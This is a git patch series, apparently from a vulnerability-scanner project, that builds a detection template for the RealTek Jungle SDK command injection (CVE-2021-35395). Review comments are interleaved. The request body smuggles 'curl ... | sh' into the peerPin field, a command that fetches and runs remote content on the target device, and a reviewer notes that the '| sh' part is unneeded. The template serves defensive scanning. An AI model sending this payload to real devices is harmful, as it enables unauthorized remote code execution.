From 5416d4cf329c11838422b440edc93c0d5deffb74 Mon Sep 17 00:00:00 2001
From: Alexander King
Date: Thu, 5 Oct 2023 11:21:04 -0500
Subject: [PATCH 1/4] Create CVE-2021-35395 template
---
 http/cves/2021/CVE-2021-35395.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 http/cves/2021/CVE-2021-35395.yaml
diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml
new file mode 100644
index 000000000000..ec5e4d936572
--- /dev/null
+++ b/http/cves/2021/CVE-2021-35395.yaml
@@ -0,0 +1,25 @@
+id: CVE-2021-35395
+info:
+ name: RealTek Jungle SDK - Arbitrary Command Injection
+ author: king-alexander
+ severity: critical
+ description: There is a command injection vulnerability on the "formWsc" page of the management interface.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35395
+ - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
+ tags: cve,kev
+
+http:
+ - raw:
+ - |
+ POST /goform/formWsc HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
+ submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
+
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
From e88448fa2cf175d055100a5c4561f57ac4f72f40 Mon Sep 17 00:00:00 2001
From: Alexander King
Date: Thu, 5 Oct 2023 11:41:33 -0500
Subject: [PATCH 2/4] Fix indentation and trailing whitespace
---
 http/cves/2021/CVE-2021-35395.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml
index ec5e4d936572..d766f8c815c6 100644
--- a/http/cves/2021/CVE-2021-35395.yaml
+++ b/http/cves/2021/CVE-2021-35395.yaml
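Review bot: The injected command in the request body pipes whatever the interactsh endpoint returns into `sh`, so every scan executes unrelated response content on the target device, while the out-of-band callback by itself already demonstrates the injection; the `| sh` is a side effect the detection does not need. I would reduce the injected fragment to the plain callback, `peerPin=12345678;curl http://{{interactsh-url}};`, and say in `description:` that the template is a detection probe rather than a verification of full command execution. With that, `severity: critical` stays justified by the finding, not by what the scan itself does to the device.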
@@ -11,12 +11,12 @@ info:
 http:
 - raw:
- - |
+ - |
 POST /goform/formWsc HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
 # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
- submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
+ submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
 matchers:
 - type: word
From 47869080a6e0da64b44015fb0b97ebea08432019 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 8 Oct 2023 12:50:07 +0530
Subject: [PATCH 3/4] updated template
---
 http/cves/2021/CVE-2021-35395.yaml | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)
diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml
index d766f8c815c6..e935387abdb9 100644
--- a/http/cves/2021/CVE-2021-35395.yaml
+++ b/http/cves/2021/CVE-2021-35395.yaml
@@ -1,13 +1,18 @@
 id: CVE-2021-35395
+
 info:
 name: RealTek Jungle SDK - Arbitrary Command Injection
 author: king-alexander
 severity: critical
 description: There is a command injection vulnerability on the "formWsc" page of the management interface.
+ impact: |
+ Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
+ remediation: |
+ Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2021-35395
 - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
- tags: cve,kev
+ tags: cve,cve2021,realtek,rce,kev
 http:
 - raw:
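Review bot: The added `remediation:` text tells an operator to apply "patches or updates provided by RealTek", but the Jungle SDK ships embedded in OEM router and IoT firmware, so the action available for a scanned host is a firmware update from the device vendor, or isolating and retiring devices that no longer receive one; suggested wording: `remediation: Update the device to vendor firmware built on a fixed Realtek SDK; devices without a vendor update should be isolated from untrusted networks.` The `impact:` block could also note that, per the `kev` tag and the linked Juniper post, this issue is exploited in the wild, which is what justifies prioritising affected devices. The `info:` block continues past this hunk.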
@@ -18,8 +23,14 @@ http:
 # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
 submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
+ matchers-condition: and
 matchers:
 - type: word
 part: interactsh_protocol
 words:
 - "http"
+
+ - type: word
+ part: interactsh_request
+ words:
+ - "User-Agent: curl"
From ed665729a0064032b79e8029b71045c8a75daff8 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 10 Nov 2023 16:15:16 +0530
Subject: [PATCH 4/4] Update CVE-2021-35395.yaml
---
 http/cves/2021/CVE-2021-35395.yaml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml
index e935387abdb9..1a813857911f 100644
--- a/http/cves/2021/CVE-2021-35395.yaml
+++ b/http/cves/2021/CVE-2021-35395.yaml
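Review bot: The new `interactsh_request` matcher makes a positive result depend on the device having `curl` and on the callback leaving the network with curl's default User-Agent, so a vulnerable device without `curl`, or one whose outbound HTTP is filtered, is reported as not affected; the template should say so, e.g. a YAML comment above `matchers-condition: and` reading `# Detection relies on an outbound curl callback; a negative result does not show the device is patched.` Tightening from the protocol-only check to the request content is the right change, since it ties the interaction to this template's command rather than to any HTTP hit on the session URL.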
@@ -4,14 +4,14 @@ info:
 name: RealTek Jungle SDK - Arbitrary Command Injection
 author: king-alexander
 severity: critical
- description: There is a command injection vulnerability on the "formWsc" page of the management interface.
- impact: |
- Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
- remediation: |
- Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
+ remediation: Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
+ description: |
+ There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2021-35395
 - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
+ metadata:
+ max-request: 1
 tags: cve,cve2021,realtek,rce,kev
 http:
@@ -20,7 +20,7 @@ http:
 POST /goform/formWsc HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
- # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
+
 submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
 matchers-condition: and
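Review bot: `remediation:` is now placed above `description:` in the `info:` block, which reverses the order the rest of this template set uses as far as I recall (description, then remediation, then reference), and makes the block harder to compare against sibling templates; I would keep `description:` first and leave the new `metadata:` entry where it is. The `info:` block continues past this hunk.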
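Review bot: The removed `#` line sat inside the `|` literal block, so it was never a YAML comment — it was transmitted as request text in the position where the blank header/body separator belongs — and its removal also drops the only explanation of why the body is shaped as it is. That rationale belongs where YAML allows it, in `description:` in this patch's first hunk, e.g. appending `The peerPin parameter of the WPS form is passed unsanitized to a shell command; this template detects the injection via an out-of-band HTTP callback.` The raw request definition starts before this hunk.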